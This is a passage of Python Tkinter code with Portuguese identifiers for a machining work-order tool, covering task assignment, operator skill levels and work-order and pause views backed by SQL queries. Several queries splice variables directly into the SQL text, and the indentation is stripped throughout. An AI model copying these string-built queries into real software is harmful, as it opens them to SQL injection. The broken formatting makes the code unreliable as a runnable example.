lbDados39 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados40 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados41 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados1.place(relx=0.205, rely=0.130, relwidth=0.02)
lbDados2.place(relx=0.445, rely=0.130, relwidth=0.02)
lbDados3.place(relx=0.695, rely=0.130, relwidth=0.02)
lbDados4.place(relx=0.945, rely=0.130, relwidth=0.02)
lbDados5.place(relx=0.205, rely=0.210, relwidth=0.02)
lbDados6.place(relx=0.445, rely=0.210, relwidth=0.02)
lbDados7.place(relx=0.695, rely=0.210, relwidth=0.02)
lbDados8.place(relx=0.945, rely=0.210, relwidth=0.02)
lbDados9.place(relx=0.205, rely=0.290, relwidth=0.02)
lbDados10.place(relx=0.445, rely=0.290, relwidth=0.02)
lbDados11.place(relx=0.695, rely=0.290, relwidth=0.02)
lbDados12.place(relx=0.945, rely=0.290, relwidth=0.02)
lbDados13.place(relx=0.205, rely=0.370, relwidth=0.02)
lbDados14.place(relx=0.445, rely=0.370, relwidth=0.02)
lbDados15.place(relx=0.695, rely=0.370, relwidth=0.02)
lbDados16.place(relx=0.945, rely=0.370, relwidth=0.02)
lbDados17.place(relx=0.205, rely=0.450, relwidth=0.02)
lbDados18.place(relx=0.445, rely=0.450, relwidth=0.02)
lbDados19.place(relx=0.695, rely=0.450, relwidth=0.02)
lbDados20.place(relx=0.945, rely=0.450, relwidth=0.02)
lbDados21.place(relx=0.205, rely=0.530, relwidth=0.02)
lbDados22.place(relx=0.445, rely=0.530, relwidth=0.02)
lbDados23.place(relx=0.695, rely=0.530, relwidth=0.02)
lbDados24.place(relx=0.945, rely=0.530, relwidth=0.02)
lbDados25.place(relx=0.205, rely=0.610, relwidth=0.02)
lbDados26.place(relx=0.445, rely=0.610, relwidth=0.02)
lbDados27.place(relx=0.695, rely=0.610, relwidth=0.02)
lbDados28.place(relx=0.945, rely=0.610, relwidth=0.02)
lbDados29.place(relx=0.205, rely=0.690, relwidth=0.02)
lbDados30.place(relx=0.445, rely=0.690, relwidth=0.02)
lbDados31.place(relx=0.695, rely=0.690, relwidth=0.02)
lbDados32.place(relx=0.945, rely=0.690, relwidth=0.02)
lbDados33.place(relx=0.205, rely=0.770, relwidth=0.02)
lbDados34.place(relx=0.445, rely=0.770, relwidth=0.02)
lbDados35.place(relx=0.695, rely=0.770, relwidth=0.02)
lbDados36.place(relx=0.945, rely=0.770, relwidth=0.02)
lbDados37.place(relx=0.205, rely=0.850, relwidth=0.02)
lbDados38.place(relx=0.445, rely=0.850, relwidth=0.02)
lbDados39.place(relx=0.695, rely=0.850, relwidth=0.02)
lbDados40.place(relx=0.945, rely=0.850, relwidth=0.02)
lbDados41.place(relx=0.205, rely=0.930, relwidth=0.02)
#Exibindo habilidades do funcionário
try:
self.cursor.execute("select Nivel from competencia where idOperador = '"+idd+"' ")
listaNivel = self.cursor.fetchall()
lista = []
for nivel in range(len(listaNivel)):
lista.append(listaNivel[nivel][0])
lbDados1['text'], lbDados2['text'], lbDados3['text'], lbDados4['text'], lbDados5['text'], lbDados6['text'], lbDados7['text'], lbDados8['text'], lbDados9['text'], lbDados10['text'], lbDados11['text'], lbDados12['text'], lbDados13['text'], lbDados14['text'], lbDados15['text'], lbDados16['text'], lbDados17['text'], lbDados18['text'], lbDados19['text'], lbDados20['text'], lbDados21['text'], lbDados22['text'], lbDados23['text'], lbDados24['text'], lbDados25['text'], lbDados26['text'], lbDados27['text'], lbDados28['text'], lbDados29['text'], lbDados30['text'], lbDados31['text'], lbDados32['text'], lbDados33['text'], lbDados34['text'], lbDados35['text'], lbDados36['text'], lbDados37['text'], lbDados38['text'], lbDados39['text'], lbDados40['text'], lbDados41['text'] = lista
except Exception as erro:
print(f'errou 1 {erro}, {(erro.__class__)}')
return messagebox.showerror('Alerta', 'Verifique a conexão com o Servidor')
self.janelaHabilidade.mainloop()
def atribuir_tarefa(self):
self.janelaAtribuir = Toplevel()
self.janelaAtribuir.title('Atribuição de tarefa')
self.janelaAtribuir['bg'] = 'white'
self.centraliza_tela(400, 400, self.janelaAtribuir)
self.prox = 0
#BOTÕES PARA PROSSEGUIR, VOLTAR A TELA E CONCLUIR
self.botAnterior = Button(self.janelaAtribuir, text='Anterior', font=('arial', 10, 'bold'), fg='#344f84', border=1, relief=SOLID, command=self.voltar_folha_anterior)
self.botProximo = Button(self.janelaAtribuir, text='Próximo', font=('arial', 10, 'bold'), fg='#344f84', border=1, relief=SOLID, command=self.chamar_proxima_folha, state=DISABLED)
self.botProximo.place(relx=0.770, rely=0.900)
self.botConcluir = Button(self.janelaAtribuir, text='Concluir', font=('arial', 10, 'bold'), fg='#344f84', border=1, relief=SOLID, command=self.inserir_atribuicao)
#FRAME 1 DA TELA 1 ONDE FICARÁ CONFIGURAÇÕES DE OS, PEÇA, TEMPO E OPERAÇÃO
def verificarPeca(*args):
h = self.campoPeca.get()
if len(h) >= 1:
if not h.isnumeric():
self.campoPeca.delete(0, END)
if h.isnumeric():
if len(h) > 13:
varPeca.set(h[:13])
self.verificar_frame1('')
def verificarQuant(*args):
h = varQuant.get()
if len(h) >= 1:
if not h.isnumeric():
self.campoQuant.delete(0, END)
if h.isnumeric():
if int(h) > 1000:
varQuant.set(varQuant.get()[:-1])
self.verificar_frame1('')
def verificarSelect(*args):
self.verificar_frame1('')
varPeca = StringVar()
varPeca.trace('w', verificarPeca)
varQuant = StringVar()
varQuant.trace('w', verificarQuant)
varSelect = StringVar()
varSelect.trace('w', verificarSelect)
self.frameAt1 = Frame(self.janelaAtribuir, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
self.frameAt1.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.280)
lbl = Label(self.janelaAtribuir, text='ATRIBUIR PROCESSO', font=('arial', 15, 'bold'), fg='#344f84', bg='white')
lbl.place(relx=0.500, rely=0.070, anchor='center')
lbl = Label(self.frameAt1, text='Peça', font=('arial', 13, 'bold'), fg='#344f84', bg='white')
lbl.place(relx=0.035, rely=0.600)
self.campoPeca = Entry(self.frameAt1, font=('arial', 12), relief=GROOVE, border=2, textvariable=varPeca)
self.campoPeca.place(relx=0.210, rely=0.600, relwidth=0.300)
lbl = Label(self.frameAt1, text='Quant.', font=('arial', 13, 'bold'), fg='#344f84', bg='white')
lbl.place(relx=0.570, rely=0.600)
self.campoQuant = Spinbox(self.frameAt1, from_=0, to=1000, font=('arial', 12), relief=GROOVE, border=2, textvariable=varQuant)
self.campoQuant.place(relx=0.780, rely=0.600, relwidth=0.200)
self.frameAt2 = Frame(self.janelaAtribuir, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
self.frameAt2.place(relx=0.100, rely=0.530, relwidth=0.800, relheight=0.250)
lbl = Label(self.frameAt2, text='Operação', font=('arial', 11, 'bold'), fg='#344f84', bg='white')
lbl.place(relx=0.010, rely=0.100)
#Buscando Operações no Banco de dados para inseri-las como opções de seleção
self.cursor.execute('select Codigo_Operacao, Processo_Usinagem from operacao')
show = self.cursor.fetchall()
ls = ['Parado']
for oper in show:
ls.append((f'{oper[0]} {oper[1]}'))
self.operacaoSelect = ttk.Combobox(self.frameAt2, font=('arial',11), state="readonly", textvariable=varSelect)
self.operacaoSelect['values'] = ls
self.operacaoSelect.current(0)
self.operacaoSelect.place(relx=0.290, rely=0.100, relwidth=0.500)
lbl = Label(self.frameAt2, text='Temp/P Oper.', font=('arial', 11, 'bold'), fg='#344f84', bg='white')
lbl.place(relx=0.010, rely=0.490)
def verificarH(*args):
h = self.campoHora.get()
if len(h) >= 1:
if not h.isnumeric():
self.campoHora.delete(0, END)
if h.isnumeric():
if int(h) >= 60:
varH.set(self.campoHora.get()[:-1])
self.verificar_frame1('')
def verificarM(*args):
m = self.campoMinuto.get()
if len(m) >= 1:
if not m.isnumeric():
self.campoMinuto.delete(0, END)
if m.isnumeric():
if int(m) >= 60:
varM.set(self.campoMinuto.get()[:-1])
self.verificar_frame1('')
def verificarS(*args):
s = self.campoSegundo.get()
if len(s) >= 1:
if not s.isnumeric():
self.campoSegundo.delete(0, END)
if s.isnumeric():
if int(s) >= 60:
varS.set(self.campoSegundo.get()[:-1])
self.verificar_frame1('')
varH = StringVar()
varH.trace('w', verificarH)
varM = StringVar()
varM.trace('w', verificarM)
varS = StringVar()
varS.trace('w', verificarS)
fHoraPorOperacao = Frame(self.frameAt2, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, width=95, height=23, bg='white')
fHoraPorOperacao.place(relx=0.380, rely=0.480)
self.campoHora = Entry(fHoraPorOperacao, font=('arial', 10), width=2, relief=GROOVE, border=0, textvariable=varH)
self.campoHora.place(x=0, y=1)
self.campoHora.insert(0, "00")
lbl = Label(fHoraPorOperacao, text=':', font=('arial', 10, 'bold'), bg='white', border=0)
lbl.place(x=22, y=0)
self.campoMinuto = Entry(fHoraPorOperacao, font=('arial', 10), width=2, relief=GROOVE, border=0, textvariable=varM)
self.campoMinuto.place(x=34, y=1)
lbl = Label(fHoraPorOperacao, text=':', font=('arial', 10, 'bold'), bg='white', border=0)
lbl.place(x=57, y=0)
self.campoMinuto.insert(0, "00")
self.campoSegundo = Entry(fHoraPorOperacao, font=('arial', 10), width=2, relief=GROOVE, border=0, textvariable=varS)
self.campoSegundo.place(x=70, y=1)
self.campoSegundo.insert(0, "00")
self.acessOperacao = IntVar()
self.acessoSimultaneoOperacao = Checkbutton(self.janelaAtribuir, text='Acesso Simultâneo', font=('arial', 9), justify=LEFT, variable=self.acessOperacao, bg='white', activebackground='white')
self.acessoSimultaneoOperacao.place(relx=0.540, rely=0.780)
#=========================================== PARTE 2 ======================================
self.frameAt3 = Frame(self.janelaAtribuir, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
lbl = Label(self.frameAt3, text='Selecione a Máquina:', font=('arial', 12, 'bold'), fg='#344f84', bg='white')
lbl.place(relx=0.020, rely=0.050)
try:
self.cursor.execute('select Codigo, Maquina from maquinas')
tuplaMaquina = self.cursor.fetchall()
except:
if messagebox.showwarning(parent=self.janelaAtribuir, title='Alerta', message='Não foi possível consultar o Banco de Dados'):
self.janelaAtribuir.destroy()
sf = ScrolledFrame(self.frameAt3, width=280, height=140)
sf.place(relx=0.030, rely=0.200, relwidth=0.950, relheight=0.799)
frame = sf.display_widget(Frame)
def irr():
pass
#print(self.listaMaquina[0][1].get())
self.listaMaquina = list()
for valor in tuplaMaquina:
self.listaMaquina.append([valor[0], valor[1]])
for i in self.listaMaquina:
vCod = i[0]
vMaq = i[1]
i[1] = Variable()
i[1].set(0)
self.maquinaCheck = Checkbutton(frame, text=vCod+" "+vMaq, font=('arial', 9), justify=LEFT, variable=i[1], command = lambda: self.verificar_frame1(''), indicatoron=True, bg='white', width=37, anchor='w')
self.maquinaCheck.pack(side=TOP, anchor='w')
self.acessMaquina = IntVar()
self.controleCheck = 0 #esta variável fará a contagem de quantas Máquinas foi selecionada
self.controleOne = '' #esta variável Armazenará a primeira Máquina que foi selecionada
self.acessoSimultaneoMaquina = Checkbutton(self.janelaAtribuir, text='Acesso Simultâneo', font=('arial', 9), justify=LEFT, variable=self.acessMaquina, bg='white', activebackground='white')
#=========================================== PARTE 3 ======================================
self.frameAt4 = Frame(self.janelaAtribuir, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
lbl = Label(self.frameAt4, text='Selecione o Operador:', font=('arial', 12, 'bold'), fg='#344f84', bg='white')
lbl.place(relx=0.020, rely=0.050)
try:
self.cursor.execute("select Nome, CPF from funcionarios where Membro = 'ativo'")
tuplaFuncionario = self.cursor.fetchall()
except:
if messagebox.showwarning(parent=self.janelaAtribuir, title='Alerta', message='Não foi possível consultar o Banco de Dados'):
self.janelaAtribuir.destroy()
sf2 = ScrolledFrame(self.frameAt4, width=280, height=140)
sf2.place(relx=0.030, rely=0.200, relwidth=0.950, relheight=0.799)
frame = sf2.display_widget(Frame)
def ir():
pass
#print(self.listaFuncionario[0][0].get())
self.listaFuncionario = list()
for valor in tuplaFuncionario:
self.listaFuncionario.append([valor[0], valor[1]])
for i in self.listaFuncionario:
vNome = i[0]
vCPF = str(i[1])
i[0] = Variable()
i[0].set(0)
Operador3 = Checkbutton(frame, text=vNome+" "+vCPF, font=('arial', 9), justify=LEFT, variable=i[0], command=lambda:self.verificar_frame1(''), indicatoron=True, bg='white', width=37, anchor='w')
Operador3.pack(side=TOP, anchor='w')
self.acessOperador = IntVar()
self.controleCheck2 = 0 #esta variável fará a contagem de quantos Operador foi selecionado
self.controleOne2 = '' #esta variável Armazenará o primeiro Operador que foi selecionado
self.acessoSimultaneoOperador = Checkbutton(self.janelaAtribuir, text='Acesso Simultâneo', font=('arial', 9), justify=LEFT, variable=self.acessOperador, bg='white', activebackground='white')
#=========================================== PARTE 4 ======================================
def onFrameConfigure(canvas):
canvas.configure(scrollregion=canvas.bbox('all'))
self.frameAt5 = Frame(self.janelaAtribuir, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
canvas = Canvas(self.frameAt5, borderwidth=0, background='white')
frame4 = Frame(canvas, background='white')
scroll = Scrollbar(self.frameAt5, orient='vertical', command=canvas.yview)
canvas.configure(yscrollcommand=scroll.set)
scroll.pack(side='right', fill='y')
canvas.pack(side='left', fill='both', expand=True)
canvas.create_window((8,8), window=frame4, anchor='nw')
frame4.bind('<Configure>', lambda event, canvas=canvas: onFrameConfigure(canvas))
self.lbl1 = Label(frame4, text='O.S:', font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
self.lbl1.grid(row=1, column=0, pady=(20,2), padx=(0,0))
self.dados1 = Label(frame4, text='tr', font=('arial', 11, 'bold'), fg='green', bg='white', width=18, anchor=W)
self.dados1.grid(row=1, column=0, pady=(20,2), padx=(1,0))
#self.lbl1.pack(side='top', anchor='w')
self.lbl2 = Label(frame4, text='Peça:', font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
self.lbl2.grid(row=2, column=0, sticky=N, pady=3)
##self.lbl2.pack(side='top', anchor='w')
self.dados2 = Label(frame4, text='tr', font=('arial', 11, 'bold'), fg='green', bg='white', width=18, anchor=W)
self.dados2.grid(row=2, column=0, pady=3, padx=(10,0))
self.lbl3 = Label(frame4, text='Operação:', font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
self.lbl3.grid(row=3, column=0, sticky=N, pady=3)
##self.lbl3.pack(side='top', anchor='w')
self.dados3 = Label(frame4, text='tr', font=('arial', 10, 'bold'), fg='green', bg='white', width=24, anchor=W)
self.dados3.grid(row=3, column=0, pady=3, padx=(84,0))
self.lbl4 = Label(frame4, text='Quantidade:', font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
self.lbl4.grid(row=4, column=0, sticky=N, pady=2)
##self.lbl4.pack(side='top', anchor='w')
self.dados4 = Label(frame4, text='tr', font=('arial', 11, 'bold'), fg='green', bg='white', width=15, anchor=W)
self.dados4.grid(row=4, column=0, pady=2, padx=(80,0))
self.lbl5 = Label(frame4, text='Tempo da Peça:', font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
self.lbl5.grid(row=5, column=0, sticky=N, pady=2)
##self.lbl5.pack(side='top', anchor='w')
self.dados5 = Label(frame4, text='tr', font=('arial', 11, 'bold'), fg='green', bg='white', width=15, anchor=W)
self.dados5.grid(row=5, column=0, pady=2, padx=(140,0))
self.lbl6 = Label(frame4, text="Máquina Selecionada:", font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
self.lbl6.grid(row=6, column=0, sticky=N, pady=2)
##self.lbl6.pack(side='top', anchor='w')
self.text1 = Text(frame4, font=('arial', 10), border=1, relief=SOLID, bg='white', state=DISABLED, width=37, height=5)
self.text1.grid(row=7, column=0, pady=2)
##self.lbl6.place(relx=0.020, rely=0.650, relwidth=0.950, relheight=0.200)
self.lbl7 = Label(frame4, text="Operador Selecionado:", font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
self.lbl7.grid(row=8, column=0, sticky=N, pady=2)
#self.lbl7.pack(side='top', anchor='w')
self.text2 = Text(frame4, font=('arial', 10), border=1, relief=SOLID, bg='white', state=DISABLED, width=37, height=5)
self.text2.grid(row=9, column=0, pady=2)
self.janelaAtribuir.transient(self.aba4)
self.janelaAtribuir.focus_force()
self.janelaAtribuir.grab_set()
self.janelaAtribuir.mainloop()
#Janela com as exibições de cada botões
def exibir_toplevel_inicio(self, event):
self.janelaDetalhesOS = Toplevel()
self.janelaDetalhesOS.title('Informações de processo')
self.janelaDetalhesOS['bg'] = 'white'
self.centraliza_tela(1000, 600, self.janelaDetalhesOS)
#Pegando o Número de O.S que foi selecionada ao abrir janela
selecionada = self.OrdemServico.selection()[0]
self.pegarOS = self.OrdemServico.item(selecionada, "values")
self.pegarOS = self.pegarOS[1]
label= Label(self.janelaDetalhesOS, text='Nº', font=('arial', 10, 'bold'), fg='#344f84', bg='white')
label.place(relx=0.870, rely=0.030)
label= Label(self.janelaDetalhesOS, text=self.pegarOS, font=('arial', 15, 'bold'), fg='red', bg='white')
label.place(relx=0.900, rely=0.020)
#Frame onde ficará contagens de OS
self.frameExibirTotalOperacao = Frame(self.janelaDetalhesOS, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
linhaCabecario = Label(self.frameExibirTotalOperacao, bg='#344f84')
linhaCabecario.place(relx=0, rely=0, relwidth=1, relheight=0.220)
labelTitle1 = Label(self.frameExibirTotalOperacao, text='Total Operações', bg='#344f84', fg='white', font=('arial', 13, 'bold'))
labelTitle1.place(relx=0, rely=0, relheight=0.210)
lbOSConcluidas = Label(self.frameExibirTotalOperacao, text='Concluídas:', bg='white', fg='black', font=('arial', 10,'bold'))
lbOSConcluidas.place(relx=0.020, rely=0.350)
lbOSConcluidasDados = Label(self.frameExibirTotalOperacao, bg='white', fg='green', font=('arial', 15, 'bold'))
lbOSConcluidasDados.place(relx=0.670, rely=0.340)
lbOSRetrabalho = Label(self.frameExibirTotalOperacao, text='Retrabalhos:', bg='white', fg='black', font=('arial', 10,'bold'))
lbOSRetrabalho.place(relx=0.020, rely=0.650)
lbOSRetrabalhoDados = Label(self.frameExibirTotalOperacao, bg='white', fg='red', font=('arial', 15, 'bold'))
lbOSRetrabalhoDados.place(relx=0.670, rely=0.640)
self.homeImg = PhotoImage(file="image/home.png")
botHome = Button(self.janelaDetalhesOS, text='Início', image=self.homeImg, bg='white', activebackground='white', compound=TOP, border=0, command=self.botao_exibir_inicio)
botHome.place(relx=0.250, rely=0.070)
self.trocarFuncioanrioImg = PhotoImage(file="image/trocar.png")
botTrocar = Button(self.janelaDetalhesOS, text='Trocar', image=self.trocarFuncioanrioImg, bg='white', activebackground='white', compound=TOP, border=0)
botTrocar.place(relx=0.400, rely=0.070)
self.pausadasImg = PhotoImage(file="image/user.png")
botPausadas = Button(self.janelaDetalhesOS, text='Pausas', image=self.pausadasImg, bg='white', activebackground='white', compound=TOP, border=0, command=self.botao_exibir_pausas)
botPausadas.place(relx=0.500, rely=0.070)
self.pecaImg = PhotoImage(file="image/peca.png")
botPeca = Button(self.janelaDetalhesOS, text='Peças util.', image=self.pecaImg, bg='white', activebackground='white', compound=TOP, border=0, command=self.botao_exibir_pecas)
botPeca.place(relx=0.600, rely=0.070)
self.infoImg = PhotoImage(file="image/info.png")
botInfo = Button(self.janelaDetalhesOS, text='Sobre', image=self.infoImg, bg='white', activebackground='white', compound=TOP, border=0, command=self.botao_exibir_sobre)
botInfo.place(relx=0.700, rely=0.070)
#Frame onde ficará as informações referente ao tempo
self.frameDadosTempo = Frame(self.janelaDetalhesOS, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
linhaCabecario = Label(self.frameDadosTempo, bg='#344f84')
linhaCabecario.place(relx=0, rely=0, relwidth=1, relheight=0.065)
labelTitle1 = Label(self.frameDadosTempo, text='Tempo/Horas', bg='#344f84', fg='white', font=('arial', 13, 'bold'))
labelTitle1.place(relx=0, rely=0, relheight=0.065)
self.lblSemInformacao = Label(self.frameDadosTempo, text='Sem Informações', font=('arial', 8), bg='white')
self.lblSemInformacao.place(relx=0.5, rely=0.5, anchor="center")
self.checkVisto = PhotoImage(file='image/check.png')
self.lb1 = Label(self.frameDadosTempo, text='Tempo Definido:', font=('arial', 10, 'bold'), bg='white', fg='green')
self.img1 = Label(self.frameDadosTempo, image=self.checkVisto, bg='white')
self.dadosTempoProgramado = Label(self.frameDadosTempo, font=('arial', 8), bg='white')
self.lb2 = Label(self.frameDadosTempo, text='Tempo Operando:', font=('arial', 10, 'bold'), bg='white', fg='green')
self.img2 = Label(self.frameDadosTempo, image=self.checkVisto, bg='white')
self.dadosTempoOperando = Label(self.frameDadosTempo, font=('arial', 8), bg='white')
self.lb3 = Label(self.frameDadosTempo, text='Tempo Gasto:', font=('arial', 10, 'bold'), bg='white', fg='green')
self.img3 = Label(self.frameDadosTempo, image=self.checkVisto, bg='white')
self.dadosTempoGasto = Label(self.frameDadosTempo, font=('arial', 8), bg='white')
self.lb4 = Label(self.frameDadosTempo, text='Tempo Extra:', font=('arial', 10, 'bold'), bg='white', fg='red')
self.check2 = PhotoImage(file='image/check2.png')
self.img4 = Label(self.frameDadosTempo, image=self.check2, bg='white')
self.dadosTempoExtra = Label(self.frameDadosTempo, font=('arial', 8), bg='white', fg='red')
#Frame onde ficará os resultado das buscas feitas ao Banco de Dados
self.frameDadosTreeview = Frame(self.janelaDetalhesOS, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
#Posiçãao estática para classificação das colunas
self.sinal = 0
#Label e Combobox para escolher o Tipo de OS a ser pesquisada
self.labelTipo = Label(self.janelaDetalhesOS, text='Tipo', font=('arial', 10, 'bold'), bg='white')
self.boxTipo = ttk.Combobox(self.janelaDetalhesOS, font=('arial',10), state='readonly')
self.boxTipo['values'] = ('Tudo', 'Nova OS', 'Retrabalho OS')
self.boxTipo.current(0)
#Label e Combobox para escolher qual tipo de pesquisa será feita
self.labelPesquisar = Label(self.janelaDetalhesOS, text='Pesquisar por', font=('arial', 10, 'bold'), bg='white')
self.boxPesquisar = ttk.Combobox(self.janelaDetalhesOS, font=('arial',10), state='readonly')
self.boxPesquisar['values'] = ('Nome', 'CPF', 'Nº Peça', 'Nº Operação')
self.boxPesquisar.current(0)
#Barra de busca e botão para pesquisar
self.strCampoBusca = StringVar()
self.strCampoBusca.trace('w', self.buscar)
self.campoBusca = Entry(self.janelaDetalhesOS, font=('arial', 12), border=2, relief=GROOVE)
self.campoBusca.bind("<Return>", self.buscar)
self.campoBusca.focus_force()
self.imgBuscar = PhotoImage(file="image/lupa.png")
self.botBuscar = Button(self.janelaDetalhesOS, image=self.imgBuscar, border=0, command=lambda:self.buscar(0))
#Tree view onde exibirá as Ordem de Serviços
self.viewOrdemServico = ttk.Treeview(self.frameDadosTreeview, column=('1','2','3','4','5','6','7'), show='headings')
self.viewOrdemServico.heading('1', text='ID', command=lambda:self.classificar_coluna('ID', self.sinal))
self.viewOrdemServico.heading('2', text='Operador', command=lambda:self.classificar_coluna('Operador', self.sinal))
self.viewOrdemServico.heading('3', text='Peça', command=lambda:self.classificar_coluna('CodigoPeca', self.sinal))
self.viewOrdemServico.heading('4', text='Operação', command=lambda:self.classificar_coluna('CodigoOperacao', self.sinal))
self.viewOrdemServico.heading('5', text='QTDE', command=lambda:self.classificar_coluna('Quant', self.sinal))
self.viewOrdemServico.heading('6', text='Máquina', command=lambda:self.classificar_coluna('Maquina', self.sinal))
self.viewOrdemServico.heading('7', text='Tipo', command=lambda:self.classificar_coluna('Estado', self.sinal))
self.viewOrdemServico.column("1", width=-90, anchor='n')
self.viewOrdemServico.column("2", width=120, anchor='n')
self.viewOrdemServico.column("3", width=1, anchor='n')
self.viewOrdemServico.column("4", width=20, anchor='n')
self.viewOrdemServico.column("5", width=-50, anchor='n')
self.viewOrdemServico.column("6", width=30, anchor='n')
self.viewOrdemServico.column("7", width=20, anchor='n')
self.viewOrdemServico.place(relx=0.025, rely=0.115, relwidth=0.945, relheight=0.840)
self.viewOrdemServico.bind("<Return>", self.exibir_info_da_operacao)
self.viewOrdemServico.bind("<ButtonRelease-1>", self.exibir_info_tempo_horas)
self.viewOrdemServico.bind("<Double-1>", self.exibir_info_da_operacao)
self.viewOrdemServico.bind("<Escape>", lambda event: self.remover_focus(event, self.viewOrdemServico))
scrollbar = Scrollbar(self.frameDadosTreeview, orient="vertical", command=self.viewOrdemServico.yview)
self.viewOrdemServico.configure(yscrollcommand=scrollbar.set)
scrollbar.place(relx=0.975, rely=0.115, relwidth=0.025, relheight=0.835)
scrollbar2 = Scrollbar(self.frameDadosTreeview, orient="horizontal", command=self.viewOrdemServico.xview)
self.viewOrdemServico.configure(xscrollcommand=scrollbar2.set)
scrollbar2.place(relx=0.025, rely=0.950, relwidth=0.950, relheight=0.045)
self.labelerro = Label(self.frameDadosTreeview, bg='white')
try:
self.cursor.execute("select * from concluidas where Tipo = 'Nova OS' and OS = "+self.pegarOS)
valido = self.cursor.fetchall()
lbOSConcluidasDados['text'] = len(valido)
self.cursor.execute("select * from concluidas where Tipo = 'Retrabalhar OS' and OS = "+self.pegarOS)
valido = self.cursor.fetchall()
lbOSRetrabalhoDados['text'] = len(valido)
self.cursor.execute("select a.id, b.Nome, a.Peca, c.Processo_Usinagem, a.Quant, d.Maquina, a.Estado from ordem_processo as a join funcionarios as b on b.id = a.idOperador join operacao as c on c.id = a.idOperacao join maquinas as d on d.id = a.idMaquina where OS ="+self.pegarOS)
valido = self.cursor.fetchall()
for i in range (len(valido)):
#extraindo do banco de dados as informações e armazenando nas variáveis
ID = valido[i][0]
Operador = valido[i][1]
CodigoPeca = valido[i][2]
CodigoOperacao = valido[i][3]
Quant = valido[i][4]
Maquina = valido[i][5]
Estado = valido[i][6]
self.viewOrdemServico.insert("", "end", values=(ID, Operador, CodigoPeca, CodigoOperacao, Quant, Maquina, Estado))
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
#Chamando widgets com referência aos dados dessa OS
self.botao_exibir_inicio()
self.exibir_toplevel_pausas()
self.exibir_toplevel_pecas()
self.exibir_toplevel_sobre()
self.janelaDetalhesOS.transient(self.aba4)
self.janelaDetalhesOS.focus_force()
self.janelaDetalhesOS.grab_set()
self.janelaDetalhesOS.mainloop()
def exibir_toplevel_pausas(self):
#Label e Combobox para escolher o Tipo de OS a ser pesquisada
self.labelTipo2 = Label(self.janelaDetalhesOS, text='Tipo', font=('arial', 10, 'bold'), bg='white')
self.boxTipo2 = ttk.Combobox(self.janelaDetalhesOS, font=('arial',10), state='readonly')
self.boxTipo2['values'] = ('Tudo', 'Nova OS', 'Retrabalho OS')
self.boxTipo2.current(0)
#Label e Combobox para escolher qual tipo de pesquisa será feita
self.labelPesquisar2 = Label(self.janelaDetalhesOS, text='Pesquisar por', font=('arial', 10, 'bold'), bg='white')
self.boxPesquisar2 = ttk.Combobox(self.janelaDetalhesOS, font=('arial',10), state='readonly')
self.boxPesquisar2['values'] = ('Nome', 'CPF')
self.boxPesquisar2.current(0)
#Barra de busca e botão para pesquisar
self.strCampoBusca2 = StringVar()
self.strCampoBusca2.trace('w', self.buscar2)
self.campoBusca2 = Entry(self.janelaDetalhesOS, font=('arial', 12), border=2, relief=GROOVE)
self.campoBusca2.bind("<Return>", self.buscar2)
self.campoBusca2.focus_force()
self.botBuscar2 = Button(self.janelaDetalhesOS, image=self.imgBuscar, border=0, command=lambda:self.buscar2(0))
self.frameDadosTreeviewPause = Frame(self.janelaDetalhesOS, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
#Tree view onde exibirá as Ordem de Serviços Pausadas
self.viewPausas = ttk.Treeview(self.frameDadosTreeviewPause, column=('1','2','3','4','5','6','7','8'), show='headings')
self.viewPausas.heading('1', text='ID')
self.viewPausas.heading('2', text='Operador')
self.viewPausas.heading('3', text='Motivo da Pausa')
self.viewPausas.heading('4', text='Peça')
self.viewPausas.heading('5', text='Tipo')
self.viewPausas.heading('6', text='Duração')
self.viewPausas.heading('7', text='Produzido')
self.viewPausas.heading('8', text='Máquina')
self.viewPausas.column("1", width=-50, anchor='n', minwidth=20)
self.viewPausas.column("2", width=120, anchor='n', minwidth=200)
self.viewPausas.column("3", width=30, anchor='n', minwidth=100)
self.viewPausas.column("4", width=20, anchor='n', minwidth=80)
self.viewPausas.column("5", width=30, anchor='n', minwidth=100)
self.viewPausas.column("6", width=20, anchor='n', minwidth=80)
self.viewPausas.column("7", width=20, anchor='n', minwidth=80)
self.viewPausas.column("8", width=30, anchor='n', minwidth=80)
self.viewPausas.place(relx=0.025, rely=0.115, relwidth=0.945, relheight=0.840)
self.viewPausas.bind("<Return>", self.exibir_info__pausa)
self.viewPausas.bind("<Double-1>", self.exibir_info__pausa)
self.viewPausas.bind("<Escape>", lambda event: self.remover_focus(event, self.viewPausas))
scrollbar3 = Scrollbar(self.frameDadosTreeviewPause, orient="vertical", command=self.viewPausas.yview)
self.viewPausas.configure(yscrollcommand=scrollbar3.set)
scrollbar3.place(relx=0.975, rely=0.115, relwidth=0.025, relheight=0.835)
scrollbar4 = Scrollbar(self.frameDadosTreeviewPause, orient="horizontal", command=self.viewPausas.xview)
self.viewPausas.configure(xscrollcommand=scrollbar4.set)
scrollbar4.place(relx=0.025, rely=0.950, relwidth=0.950, relheight=0.045)
self.labelerro2 = Label(self.frameDadosTreeviewPause, bg='white')
